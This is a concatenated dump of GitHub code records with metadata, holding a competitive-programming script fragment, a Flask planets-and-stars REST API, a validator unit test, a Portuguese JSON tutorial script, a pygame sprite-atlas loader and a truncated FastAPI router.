print(k,j)\n print(parent)\n print(child)\n child[k].remove(j)\n\n ans.append((j,i))\n ans.append((j,k))\n\n\nprint('\\n'.join(map(lambda x: ' '.join(map(str,x)), ans)))\n\n\n\n\n'''\n端点から決めていけば確定する?\n\n閉路どうしよう問題\nK5とか。\n\n先に閉路?\n\n偶数長の道は処理できる。\n\n二部グラフである必要ある?\n→ ない\n\n\n一本出たら、もう一本出さないといけない。\n\n2辺消して、継続できればOK?\n\n頂点数奇数の木はいける\n\n\n木がいけるのにグラフがいけないことある?\n→ 全体の連結を保ったまま辺を除いていければよい\n\n根を決めておいて、一番遠いところから処理すればよい?\n\n頂点深さのheapqを持つ\n一番深い頂点をとる。\n端点じゃなければ、2辺取る。\n\n端点なら1辺とって、行った先か一番深いところへ行く\n\nこれを繰り返せばOKでは?\n\n'''\n", "repo_name": "komajun365/competitive_programming", "sub_path": "agc/agc035_old/b2.py", "file_name": "b2.py", "file_ext": "py", "file_size_in_byte": 5221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.stdin", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.setrecursionlimit", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 90, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 133, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 137, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 148, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 165, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "10657536490", "text": "import os\nimport sys\nfrom models import db, setup_db, Planets, Stars\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom auth import AuthError, requires_auth\n\n\ndef create_app(test_config=None):\n\n app = Flask(__name__)\n setup_db(app)\n CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, POST, PATCH, DELETE, OPTIONS')\n return response\n\n @app.route(\"/\")\n def index():\n return jsonify({\"status\": \"Hey I'm working\"})\n\n '''planets'''\n\n @app.route(\"/planets\")\n @requires_auth('get:planets')\n def get_planets(payload):\n error = False\n try:\n get_planets = Planets.query.all()\n planets = []\n for planet in get_planets:\n planets.append({\n 'id': planet.id,\n 'name': planet.name,\n 'moons_number': planet.moons_number\n })\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'planets': planets\n })\n\n @app.route(\"/planets\", methods=[\"POST\"])\n @requires_auth('post:planets')\n def add_planet(payload):\n error = False\n try:\n name = request.get_json()['name']\n moons_number = request.get_json()['moonsNumber']\n add = Planets(\n name=name,\n moons_number=moons_number\n )\n add.insert()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'name': name,\n 'moons_number': moons_number\n })\n\n @app.route('/planets/', methods=['DELETE'])\n @requires_auth('delete:planets')\n def del_planets(payload, planet_id):\n error = False\n try:\n planets = Planets.query.filter_by(id=planet_id).first()\n planets.delete()\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.route('/planets/', methods=[\"PATCH\"])\n @requires_auth('patch:planets')\n def patch_planets(payload, planet_id):\n error = False\n get_planets = Planets.query.filter_by(id=planet_id).first()\n try:\n name = request.get_json()[\"name\"]\n moons_number = request.get_json()[\"moonsNumber\"]\n get_planets.name = name\n get_planets.moons_number = moons_number\n get_planets.update()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True\n })\n\n '''stars'''\n\n @app.route(\"/stars\")\n @requires_auth('get:stars')\n def stars(payload):\n error = False\n try:\n get_stars = Stars.query.all()\n stars = []\n for star in get_stars:\n stars.append({\n 'id': star.id,\n 'name': star.name,\n 'age': star.age\n })\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'stars': stars})\n\n @app.route(\"/stars\", methods=[\"POST\"])\n @requires_auth('post:stars')\n def add_stars(payload):\n error = False\n try:\n name = request.get_json()['name']\n age = request.get_json()['age']\n add = Stars(\n name=name,\n age=age\n )\n add.insert()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'name': name,\n 'age': age\n })\n\n @app.route('/stars/', methods=['DELETE'])\n @requires_auth('delete:stars')\n def del_stars(payload, star_id):\n error = False\n stars = Stars.query.filter_by(id=star_id).first()\n try:\n stars.delete()\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.route('/stars/', methods=['PATCH'])\n @requires_auth('patch:stars')\n def patch_stars(payload, star_id):\n error = False\n try:\n get_stars = Stars.query.filter_by(id=star_id).first()\n name = request.get_json()[\"name\"]\n age = request.get_json()[\"age\"]\n get_stars.name = name\n get_stars.age = age\n get_stars.update()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"Not found\"\n }), 404\n\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 400,\n \"message\": \"bad request\"\n }), 400\n\n @app.errorhandler(500)\n def bad_request(error):\n return jsonify({\n \"success\": False,\n \"error\": 500,\n \"message\": \" Internal Server Error\"\n }), 500\n\n @app.errorhandler(AuthError)\n def auth_error(error):\n return jsonify({\n \"success\": False,\n \"error\": error.status_code,\n \"message\": error.error['description']\n }), error.status_code\n\n return app\n\n\napp = create_app()\n", "repo_name": "shaimaaseyam/capastone", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 6643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "models.setup_db", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Planets.query.all", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "models.Planets", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Planets.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 90, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Planets.query.filter_by", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Planets.query", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.Planets", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 111, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Stars.query.all", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 122, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 136, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 144, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "models.Stars", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 157, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 140, "usage_type": "call"}, {"api_name": "models.Stars.query.filter_by", "line_number": 167, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 167, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 174, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 176, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 164, "usage_type": "call"}, {"api_name": "models.Stars.query.filter_by", "line_number": 185, "usage_type": "call"}, {"api_name": "models.Stars.query", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.Stars", "line_number": 185, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 186, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 195, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 197, "usage_type": "call"}, {"api_name": "auth.requires_auth", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 203, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 235, "usage_type": "call"}, {"api_name": "auth.AuthError", "line_number": 233, "usage_type": "argument"}]} +{"seq_id": "13756007653", "text": "import unittest\nimport json\nfrom validators.greaterthan import Greaterthan\n\n\nclass GreaterthanTest(unittest.TestCase):\n\n def _load_test_data(self):\n self.validation = json.loads('{\"condition\": \"greaterthan\",\"value\": \"10\",\"type\": \"error\",\"message\": \"This field should be less than 11\"}')\n\n def test_is_greater_than(self):\n self._load_test_data()\n number = \"11\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number) == False\n\n def test_is_less_than(self):\n self._load_test_data()\n number = \"2\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number)\n\n def test_is_than_with_decimal(self):\n self._load_test_data()\n number = \"1.0\"\n validator = Greaterthan(self.validation)\n assert validator.is_valid(number)\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "ONSdigital/alpha-eq-survey-runner", "sub_path": "validators/greaterthan_test.py", "file_name": "greaterthan_test.py", "file_ext": "py", "file_size_in_byte": 899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 9, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 14, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 20, "usage_type": "call"}, {"api_name": "validators.greaterthan.Greaterthan", "line_number": 26, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "42307662229", "text": "\"\"\"\nJson é basicamente uma estrutura de dados que foi criada para que você transporte\nou salve dados. \n\"\"\" \n\"\"\"\nDados que podem ter no Json são bolean, number(int ou float), null(nada), string,\narray (\"[]\") são como se fosse uma lista, e por fim um \"{}\" igual aos objetos(dictionary)\n\"\"\"\n\n\n#Exemplo1 de arquivo json :\n\n\"\"\"\n[\n {\"name\": \"Luiz\", \"lasName\": \"Miranda\", \"age\": \"22\"},\n {\"name\": \"Rafael\", \"lasName\": \"Alves\", \"age\": \"15\"},\n {\"name\": \"João\", \"lasName\": \"Henrique\", \"age\": \"16\"},\n {\"name\": \"Billy\", \"lasName\": \"Paul\", \"age\": \"16\"},\n {\"name\": \"Kayo\", \"lasName\": \"Gabriel\", \"age\": \"17\"}\n]\n\n\"\"\"\n\n# Exemplo2 de arquivo json :\n\n# {\n# \"name\": \"Luiz\", \n# \"lasName\": \"Miranda\", \n# \"age\": \"22\",\n# \"adresses\": [\n# {\"line1\": \"av. brasil\"},\n# {\"line2\": \"av. amapá\"}\n# ]\n# }\n\n\n\n\n\n\nimport json\nimport os\n\n\n# pessoas = [\n# {\n# \"nome\": 'maria',\n# \"sobrenome\": 'santos',\n# \"idade\": 25,\n# \"ativo\": False,\n# \"notas\": ['A', 'A+'],\n# \"telefones\": {\n# \"residencial\": \"00 0000-0000\",\n# \"celular\": \"00 0000-0000\",\n# }\n# },\n# {\n# \"nome\": 'Joana',\n# \"sobrenome\": 'Moreira',\n# \"idade\": 32,\n# \"ativo\": True,\n# \"notas\": ['B', 'A'],\n# \"telefones\": {\n# \"residencial\": \"00 0000-0000\",\n# \"celular\": \"00 0000-0000\",\n# }\n# }, \n# ]\n\n# BASE_DIR = os.path.dirname(__file__) # Criação do caminho completo do arquivo aonde está\n# SAVE_TO = os.path.join(BASE_DIR, 'arquivo-python.json') # Este seria o arquivo\n# # Irá ter o caminho (BASE_DIR) mais o nome do arquivo ^\n\n\n# with open(SAVE_TO, 'w') as file: # File é o nome do arquivo\n# json.dump(pessoas, file, indent=2) # salva o dictionary como json file.\n\n\n# print(json.dumps(pessoas, indent=2))\n\n\n# Carregar de fora para dentro o json___________________________________________________________\n\nBASE_DIR = os.path.dirname(__file__) \nJSON_FILE = os.path.join(BASE_DIR, 'arquivo-python.json') \n\n# with open(JSON_FILE, 'r') as file:\n# pessoas = json.load(file)\n \n# for pessoa in pessoas:\n# print(pessoa['nome'], pessoa['notas'])\n\n\n# with open(JSON_FILE, 'r') as file:\n# pessoas = json.load(file)\n# print(json.dumps(pessoas)) # Converte ele em dumps e o printa.\n\n\njson_string = '''\n[{\"nome\": \"maria\", \"sobrenome\": \"santos\", \"idade\": 25, \"ativo\": false, \"notas\": [\"A\", \"A+\"], \"telefones\": {\"residencial\": \"00 0000-0000\", \"celular\": \"00 0000-0000\"}}, {\"nome\": \"Joana\", \"sobrenome\": \"Moreira\", \"idade\": 32, \"ativo\": true, \"notas\": [\"B\", \"A\"], \"telefones\": {\"residencial\": \"00 0000-0000\", \"celular\": \"00 0000-0000\"}}]\n''' # aqui foi usado para pegar a string\n\npessoas = json.loads(json_string) # Carrega as \"pessoas\" em formato de string\n # ele lê isto, entende, e converte em uma lista python.\n\nfor pessoa in pessoas:\n print(pessoa['nome'])\n# faz o for na lista e pega os dados de voltas\n\n\"\"\"\n load = carrega um arquivo.\n dump = joga para fora.\n json.dump = O dump normal, em um arquivo.\n json.dumps = Seria o dump de uma string, fazendo dump em uma string.\n ident = Formata a string\n\"\"\"", "repo_name": "CidineiPuto/aulaDePython", "sub_path": "aula123.py", "file_name": "aula123.py", "file_ext": "py", "file_size_in_byte": 3124, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.dirname", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "40083120995", "text": "import os\nimport copy\nimport pygame\nfrom animation import Animation\nfrom animation import StaticAnimation\nfrom entities.gui.sliced_image import SlicedImage\nimport config\n\n# if rescale is not a factor of 2, sprites will have fuzzy edges that will look terrible with color keying\nassert config.rescale_factor % 2 == 0, \"factor must be a multiple of 2\"\nassert isinstance(config.rescale_factor, int), \"factor must be an int value\"\n\n\nclass SpriteAtlasError(Exception):\n def __init__(self, name):\n super().__init__()\n self.name = name\n\n\nclass SpriteNotFoundError(SpriteAtlasError):\n def __init__(self, sprite_name):\n super().__init__(sprite_name)\n\n\nclass InvalidDimensionsError(SpriteAtlasError):\n def __init__(self, name, rect, wh):\n super().__init__(name)\n self.rect = rect\n self.dimensions = wh\n\n\nclass SpriteAtlas:\n \"\"\"An atlas is a grouped set of surfaces. By itself, it doesn't do much\n more than read the main surface into memory along with a txt file that describes\n the surfaces contained within the atlas. This information can be used to create\n specific Animation instances for later use by calling appropriate methods on the atlas\"\"\"\n def __init__(self, atlas_path=None, tf_use_rescale_factor=True, convert=True):\n # use the descriptor file to load subsurfaces\n self.sprite_rects = {}\n\n if atlas_path is not None and len(atlas_path) > 0:\n # locate atlas descriptor\n basename = os.path.splitext(atlas_path)[0]\n atlas_descriptor = basename + '.txt'\n\n if not os.path.exists(atlas_descriptor) or not os.path.exists(atlas_path):\n raise FileNotFoundError(atlas_descriptor)\n\n self.atlas = pygame.image.load(atlas_path)\n\n if not self.atlas:\n raise FileNotFoundError(atlas_path)\n\n if tf_use_rescale_factor:\n # apply rescaling\n # rescale without resampling\n scaled_size = (self.atlas.get_width() * config.rescale_factor,\n self.atlas.get_height() * config.rescale_factor)\n\n self.atlas = self.atlas \\\n if config.rescale_factor == 1 else pygame.transform.scale(self.atlas, scaled_size)\n\n self.rescale_factor = config.rescale_factor\n else:\n self.rescale_factor = 1\n\n file = open(atlas_descriptor, 'r')\n\n if not file:\n raise FileNotFoundError(atlas_descriptor)\n\n for line in file:\n # of the form: name = left top width height\n name, rect_str = [s.strip() for s in line.split('=')]\n rect = self._get_rect_from_str(rect_str)\n\n # apply rescale factor\n rect.x *= self.rescale_factor\n rect.y *= self.rescale_factor\n rect.width *= self.rescale_factor\n rect.height *= self.rescale_factor\n\n # add sprite to dictionary\n self.sprite_rects[name] = rect\n else:\n self.__sprite_rects = {}\n self.atlas = None\n\n self.animations = {}\n self.statics = {} # statics aren't initialized to anything by default so user can specify color key if wanted\n self.sliced = {}\n\n if convert and self.atlas is not None:\n self.atlas = self.atlas.convert()\n\n @property\n def sprite_names(self):\n return list(self.sprite_rects.keys())\n\n def initialize_animation(self, name, frame_width, frame_height, duration, color_key=None):\n if name in self.animations:\n return self.animations[name]\n\n # grab rect for this name\n if name not in self.sprite_rects:\n raise SpriteNotFoundError(name)\n\n rect = self.sprite_rects[name]\n\n frame_height = frame_height or frame_width\n\n if rect.width % frame_width != 0 or rect.height % frame_height != 0:\n raise InvalidDimensionsError(name, rect, (frame_width, frame_height))\n\n frames = [self.atlas.subsurface(\n pygame.Rect(x, y, frame_width, frame_height))\n for y in range(rect.y, rect.y + rect.height, frame_height)\n for x in range(rect.x, rect.x + rect.width, frame_width)]\n\n if color_key is not None:\n # cannot use per-pixel alpha values in this case\n converted = [s.convert() for s in frames]\n frames = converted\n\n for f in frames:\n f.set_colorkey(color_key)\n\n animation = Animation(frames, duration)\n\n self.animations[name] = animation\n\n def initialize_static(self, name, color_key=None, override_width=None, override_height=None):\n rect = self._fetch(name, self.sprite_rects)\n\n if override_width or override_height:\n rect = rect.copy() # don't affect original dimensions\n\n rect.width = override_width or rect.width\n rect.height = override_height or rect.height\n\n assert 0 <= rect.width <= self.atlas.get_width(), \"width out of range\"\n assert 0 <= rect.height <= self.atlas.get_height(), \"height out of range\"\n\n assert 0 <= rect.x <= self.atlas.get_width() - rect.width, \"x position out of range\"\n assert 0 <= rect.y <= self.atlas.get_height() - rect.height, \"y position out of range\"\n\n surf = self.atlas.subsurface(rect)\n\n if color_key is not None:\n surf = surf.convert()\n surf.set_colorkey(color_key)\n\n self.statics[name] = StaticAnimation(surf)\n\n def initialize_static_from_surface(self, name, surf):\n self.statics[name] = StaticAnimation(surf)\n\n def initialize_animation_from_frames(self, name, frames, duration):\n assert len(frames) > 0\n\n self.animations[name] = Animation(frames, duration)\n\n def initialize_slice_from_surface(self, name, surf, dims):\n self.sliced[name] = SlicedImage(surf, dims)\n\n def initialize_slice(self, name, slice_size, color_key=None):\n assert len(slice_size) == 2\n\n if name not in self.sprite_rects:\n raise SpriteNotFoundError(name)\n\n # todo: check for double-initialization?\n\n rect = self.sprite_rects[name]\n slice_img = self.atlas.subsurface(rect)\n\n # this surface must be at LEAST 24 bit or else scaling will fail\n if slice_img.get_bitsize() < 24:\n slice_img = slice_img.convert(24)\n\n if color_key is not None:\n slice_img = slice_img.convert()\n assert slice_img.get_bitsize() >= 24 # just to catch unexpected edge cases\n\n slice_img.set_colorkey(color_key)\n\n self.sliced[name] = SlicedImage(slice_img, slice_size)\n\n def load_static(self, name):\n return copy.copy(self._fetch(name, self.statics))\n\n def load_animation(self, name):\n return copy.copy(self._fetch(name, self.animations))\n\n def load_sliced(self, name):\n return copy.copy(self._fetch(name, self.sliced))\n\n def __add__(self, other):\n assert other is not self, \"adding atlas to itself makes no sense\"\n\n # create a new atlas that combines the two previous atlas\n # in this special case, we want shallow copies because it's likely the two atlases to be added\n # are about to be thrown away\n\n def get_names(an_atlas):\n sprite_names = set()\n\n for li in [an_atlas.sliced, an_atlas.statics, an_atlas.animations, an_atlas.sprite_rects]:\n for key_name in li.keys():\n sprite_names.add(key_name)\n\n return sprite_names\n\n # check for duplicate names and warn if any are found, because it may cause the atlas to choose\n # the wrong sprites\n intersections = get_names(self).intersection(get_names(other))\n\n for inter in intersections:\n print(f\"Warning! Two sprites named '{inter}' \"\n f\"in atlases to be combined; consider renaming one of the sprites\")\n\n new_atlas = SpriteAtlas()\n\n for new_d, our_d, other_d in [(new_atlas.sprite_rects, self.sprite_rects, other.sprite_rects),\n (new_atlas.statics, self.statics, other.statics),\n (new_atlas.animations, self.animations, other.animations),\n (new_atlas.sliced, self.sliced, other.sliced)]:\n new_d.update(our_d)\n new_d.update(other_d)\n\n return new_atlas\n\n def scale(self, new_size):\n if new_size is not tuple:\n new_size = (new_size, new_size)\n\n self.atlas = pygame.transform.scale(self.atlas, new_size)\n\n # modify all sprite rects\n old_rects = self.sprite_rects\n self.sprite_rects = {}\n\n # rather than come up with fancy logic to re-create all the sprites, or just to resize them (since that\n # will result in doubling memory use), just assume this will be an operation that happens before any\n # initializing of sprites and warn if it doesn't\n if len(self.statics) > 0 or len(self.animations) > 0 or len(self.sliced) > 0:\n print(\"Warning! Scaling an atlas will result in all initialized sprites being lost\")\n\n self.statics = {}\n self.animations = {}\n self.sliced = {}\n\n for name, rect in old_rects:\n nr = pygame.Rect(rect.x * new_size[0], rect.y * new_size[1],\n rect.width * new_size[0], rect.height * new_size[1])\n self.sprite_rects[name] = nr\n\n @staticmethod\n def _fetch(name, location):\n name = name.strip()\n\n if name not in location:\n print(\"could not find sprite '{}' in atlas\".format(name))\n raise SpriteNotFoundError(name)\n return location[name]\n\n @staticmethod\n def _get_rect_from_str(rect_str):\n r = pygame.Rect(0, 0, 0, 0)\n\n r.left, r.top, r.width, r.height = [int(x) for x in rect_str.split(' ')]\n\n return r\n", "repo_name": "amrazek/386-super-mario", "sub_path": "assets/sprite_atlas.py", "file_name": "sprite_atlas.py", "file_ext": "py", "file_size_in_byte": 10013, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "config.rescale_factor", "line_number": 10, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 49, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 57, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 58, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 61, "usage_type": "attribute"}, {"api_name": "config.rescale_factor", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 116, "usage_type": "call"}, {"api_name": "animation.Animation", "line_number": 128, "usage_type": "call"}, {"api_name": "animation.StaticAnimation", "line_number": 153, "usage_type": "call"}, {"api_name": "animation.StaticAnimation", "line_number": 156, "usage_type": "call"}, {"api_name": "animation.Animation", "line_number": 161, "usage_type": "call"}, {"api_name": "entities.gui.sliced_image.SlicedImage", "line_number": 164, "usage_type": "call"}, {"api_name": "entities.gui.sliced_image.SlicedImage", "line_number": 187, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 190, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 193, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 196, "usage_type": "call"}, {"api_name": "pygame.transform.scale", "line_number": 237, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 237, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 254, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 269, "usage_type": "call"}]} +{"seq_id": "16864835228", "text": "from typing import Any, List\nfrom unittest import result\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom app import schemas\nfrom app import crud\n\nfrom app.api.dependencies import get_db\n\nrouter = APIRouter()\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef refresh_job(\n db: Session = Depends(get_db), \n obj_in = schemas.job_search_service.RefreshJobRequest) -> Any:\n result = crud.job_search_service.refresh_job(db = db, obj_in = obj_in)\n return result\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef update_failed(*,\n db: Session = Depends(get_db),\n obj_in: schemas.job_search_service.UpdateFailRequest) -> Any:\n result = crud.job_search_service.update_failed(db = db, obj_in = obj_in)\n return result\n\n\n@router.post(\"\",\n response_model=schemas.Message)\ndef create_metadata(*,\n db: Session = Depends(get_db),\n obj_in: schemas.job_search_service.CreateMetaDataRequest) -> Any:\n\n result = crud.job_search_service.create_metadata(db = db, obj_in = obj_in)\n return result", "repo_name": "prd-tai-nguyen/test", "sub_path": "app/api/v1/endpoints/job_search_service.py", "file_name": "job_search_service.py", "file_ext": "py", "file_size_in_byte": 1200, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 18, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 18, "usage_type": "argument"}, {"api_name": "app.schemas.job_search_service", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 19, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 20, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.refresh_job", "line_number": 20, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 20, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 21, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 19, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 27, "usage_type": "name"}, {"api_name": "app.schemas.job_search_service", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 28, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 27, "usage_type": "call"}, {"api_name": "app.api.dependencies.get_db", "line_number": 27, "usage_type": "argument"}, {"api_name": "unittest.result", "line_number": 29, "usage_type": "name"}, {"api_name": "app.crud.job_search_service.update_failed", "line_number": 29, "usage_type": "call"}, {"api_name": "app.crud.job_search_service", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app.crud", "line_number": 29, "usage_type": "name"}, {"api_name": "unittest.result", "line_number": 30, "usage_type": "name"}, {"api_name": "app.schemas.Message", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app.schemas", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 36, "usage_type": "name"}, {"api_name": 